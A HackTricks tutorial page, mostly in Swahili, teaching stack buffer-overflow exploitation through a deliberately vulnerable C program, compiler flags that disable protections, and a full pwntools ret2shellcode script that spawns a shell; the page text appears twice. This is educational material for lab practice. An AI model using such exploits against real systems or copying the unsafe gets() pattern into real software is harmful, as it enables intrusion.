Stack Shellcode

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Stack shellcode ni mbinu inayotumika katika binary exploitation ambapo mshambuliaji anaandika shellcode kwenye stack ya programu iliyo hatarini na kisha kubadilisha Instruction Pointer (IP) au Extended Instruction Pointer (EIP) ili kuelekeza kwenye eneo la shellcode hii, na kusababisha itekelezwe. Hii ni njia ya jadi inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zisizo na mipaka kwenye mfumo wa lengo. Hapa kuna muhtasari wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayolingana kwa kutumia Python na pwntools.

C Example: A Vulnerable Program

Tuanze na mfano rahisi wa programu ya C iliyo hatarini:

#include <stdio.h>
#include <string.h>

void vulnerable_function() {
char buffer[64];
gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
vulnerable_function();
printf("Returned safely\n");
return 0;
}

Huu programu ina udhaifu wa overflow ya buffer kutokana na matumizi ya kazi ya gets().

Uundaji

Ili kuunda programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo:

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c

-fno-stack-protector: Inazima ulinzi wa stack.
-z execstack: Inafanya stack kuwa executable, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.
-no-pie: Inazima Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa.
-m32: Inakusanya programu kama executable ya 32-bit, mara nyingi hutumiwa kwa urahisi katika maendeleo ya exploit.

Python Exploit using Pwntools

Hapa kuna jinsi unavyoweza kuandika exploit katika Python ukitumia pwntools kufanya shambulio la ret2shellcode:

from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()

This script constructs a payload consisting of a NOP slide, the shellcode, and then overwrites the EIP with the address pointing to the NOP slide, ensuring the shellcode gets executed.

The NOP slide (asm('nop')) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the p32() argument to the starting address of your buffer plus an offset to land in the NOP slide.

Protections

ASLR inapaswa kuzuiliwa ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa sawa kila wakati na unahitaji kuvuja ili kubaini wapi kazi ya ushindi imepakiwa.
Stack Canaries inapaswa pia kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe.
NX kinga ya stack itazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka.

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/shellcode
https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html
64bit, ASLR with stack address leak, write shellcode and jump to it
https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html
32 bit, ASLR with stack leak, write shellcode and jump to it
https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html
32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/
arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousRet2win - arm64 NextStack Shellcode - arm64

Last updated 4 months ago

Basic Information

C Example: A Vulnerable Program

Tuanze na mfano rahisi wa programu ya C iliyo hatarini:

#include <stdio.h>
#include <string.h>

void vulnerable_function() {
char buffer[64];
gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
vulnerable_function();
printf("Returned safely\n");
return 0;
}

Huu programu ina udhaifu wa overflow ya buffer kutokana na matumizi ya kazi ya gets().

Uundaji

Ili kuunda programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo:

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c

-fno-stack-protector: Inazima ulinzi wa stack.

-z execstack: Inafanya stack kuwa executable, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.

-no-pie: Inazima Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa.

-m32: Inakusanya programu kama executable ya 32-bit, mara nyingi hutumiwa kwa urahisi katika maendeleo ya exploit.

Python Exploit using Pwntools

Hapa kuna jinsi unavyoweza kuandika exploit katika Python ukitumia pwntools kufanya shambulio la ret2shellcode:

from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()

This script constructs a payload consisting of a NOP slide, the shellcode, and then overwrites the EIP with the address pointing to the NOP slide, ensuring the shellcode gets executed.

Protections

ASLR inapaswa kuzuiliwa ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa sawa kila wakati na unahitaji kuvuja ili kubaini wapi kazi ya ushindi imepakiwa.

Stack Canaries inapaswa pia kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe.

NX kinga ya stack itazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka.